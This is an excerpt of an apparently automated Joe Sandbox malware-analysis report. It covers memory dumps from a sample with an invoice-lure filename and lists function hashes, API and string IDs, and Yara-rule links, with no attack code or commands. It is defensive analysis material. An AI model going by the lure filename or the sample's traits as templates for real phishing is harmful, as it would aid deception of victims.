                                  • Source File: 00000003.00000002.2382945786.00000000324B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324B0000, based on PE: true
                                  • Associated: 00000003.00000002.2382945786.00000000325D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2382945786.00000000325DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2382945786.000000003264E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_324b0000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: @
                                  • API String ID: 0-2766056989
                                  • Opcode ID: c018774b2f238f78e35277b83e1ae7aa9647fd8114bb25bce336b3f5e2c9d34c
                                  • Instruction ID: 7123d9a668f89763755bce67c9b95e336e20b236cfadc8bfee30452dfd5ef78d
                                  • Opcode Fuzzy Hash: c018774b2f238f78e35277b83e1ae7aa9647fd8114bb25bce336b3f5e2c9d34c
                                  • Instruction Fuzzy Hash: 10322674D04369DFEB25CF64C984BDDBBB0BB08305F0041E9D94AA7281DBB59A85CF91
                                  Function 32527D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON
                                  Download Yara Rule
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2382945786.00000000324B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324B0000, based on PE: true
                                  • Associated: 00000003.00000002.2382945786.00000000325D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2382945786.00000000325DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2382945786.000000003264E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_324b0000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                  Similarity
                                  • API ID: __aulldvrm
                                  • String ID: +$-
                                  • API String ID: 1302938615-2137968064
                                  • Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                  • Instruction ID: 5ad556acd5242ff9ad7a9bfa2a0ea90aaad72d1400135b14d55cfac39f77aa0a
                                  • Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                  • Instruction Fuzzy Hash: 2191C3B5E043169FEB14CF69D8817AEBBB5EF44365F50461AE864AB2C0EB309B40C761
                                  Function 32514C59 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 164COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2382945786.00000000324B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324B0000, based on PE: true
                                  • Associated: 00000003.00000002.2382945786.00000000325D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2382945786.00000000325DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2382945786.000000003264E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_324b0000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: 0$Flst
                                  • API String ID: 0-758220159
                                  • Opcode ID: a1f6ccf817f26e886149204a002172a5c69676e68d6d4f18d95f5534b9f2ad85
                                  • Instruction ID: 83f0059087031033667b74e5afa875073bd51315b149a72f9380eaa7607b27fb
                                  • Opcode Fuzzy Hash: a1f6ccf817f26e886149204a002172a5c69676e68d6d4f18d95f5534b9f2ad85
                                  • Instruction Fuzzy Hash: C3519BB5E002489FEF15CF98D484759FBF4EF44799F65902ED4099B250EB70AA85CB80
                                  Function 324E04E5 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 153timeCOMMON
                                  Download Yara Rule
                                  APIs
                                  Strings
                                  • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 324E063D
                                  • kLsE, xrefs: 324E0540
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2382945786.00000000324B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324B0000, based on PE: true
                                  • Associated: 00000003.00000002.2382945786.00000000325D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2382945786.00000000325DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2382945786.000000003264E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_324b0000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                  Similarity
                                  • API ID: DebugPrintTimes
                                  • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                  • API String ID: 3446177414-2547482624
                                  • Opcode ID: 16f3565602a39e59d180479155dbd8ad3e8111aacea566f3e6b2a315e2912470
                                  • Instruction ID: 7fcb4b865470dc55e0ab77ba0a88268e669895397379468ccb02beb12029cfa3
                                  • Opcode Fuzzy Hash: 16f3565602a39e59d180479155dbd8ad3e8111aacea566f3e6b2a315e2912470
                                  • Instruction Fuzzy Hash: BE5179B59047429BE324DF74C5807A7B7E4AF84705F00983EE9EA97240EB74D646CFA2
                                  Function 325607C3 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 114timeCOMMON
                                  Download Yara Rule
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2382945786.00000000324B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324B0000, based on PE: true
                                  • Associated: 00000003.00000002.2382945786.00000000325D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2382945786.00000000325DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2382945786.000000003264E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_324b0000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                  Similarity
                                  • API ID: DebugPrintTimes
                                  • String ID: T>l$T>l(
                                  • API String ID: 3446177414-2702479517
                                  • Opcode ID: f885e82d2c6375ac2d9e14c6967a4e4bdb2551c468baf06de15a3331c66c99b5
                                  • Instruction ID: 63ea3c5c73508bac9a68c7f03517d76c749a0e18a8966401d9220d49820a914d
                                  • Opcode Fuzzy Hash: f885e82d2c6375ac2d9e14c6967a4e4bdb2551c468baf06de15a3331c66c99b5
                                  • Instruction Fuzzy Hash: 3D417E729043419FD360DF29C844B9BBBE8FF88764F404A2EF598D7291DB709A45CB92
                                  Function 324DDF81 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 109timeCOMMON
                                  Download Yara Rule
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2382945786.00000000324B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324B0000, based on PE: true
                                  • Associated: 00000003.00000002.2382945786.00000000325D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2382945786.00000000325DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2382945786.000000003264E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_324b0000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                  Similarity
                                  • API ID: DebugPrintTimes
                                  • String ID: 0$0
                                  • API String ID: 3446177414-203156872
                                  • Opcode ID: c174cd5c65a254dbe81554381a606f2f872b648178dd0850bdd271e3ea4b63e6
                                  • Instruction ID: 0f21ce7f49df30f5de89f4cd1c9c10482e0d240116abd613d02019f2cb3dbfaf
                                  • Opcode Fuzzy Hash: c174cd5c65a254dbe81554381a606f2f872b648178dd0850bdd271e3ea4b63e6
                                  • Instruction Fuzzy Hash: 51415CB6A08705DFD301CF28C494A1ABBE4BB88354F04492EF989DB341D771EA46CF96
                                  Function 3257AEB0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 89timeCOMMON
                                  Download Yara Rule
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2382945786.00000000324B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324B0000, based on PE: true
                                  • Associated: 00000003.00000002.2382945786.00000000325D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2382945786.00000000325DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2382945786.000000003264E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_324b0000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                  Similarity
                                  • API ID: DebugPrintTimes
                                  • String ID: NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p$T>l(
                                  • API String ID: 3446177414-3982621871
                                  • Opcode ID: e5765edba49cf75c832b961c144db328c0598b1b5614b0c20b6e4bd10d2cd9cd
                                  • Instruction ID: 8d383c7d92858ed218cc7b733c3c89977ca65c8279ffe95bfe46054b22efe8cb
                                  • Opcode Fuzzy Hash: e5765edba49cf75c832b961c144db328c0598b1b5614b0c20b6e4bd10d2cd9cd
                                  • Instruction Fuzzy Hash: 423135BAE41604AFD701DF68CD00F5ABBB5FF84714F508665F900E7280C735AA41CB90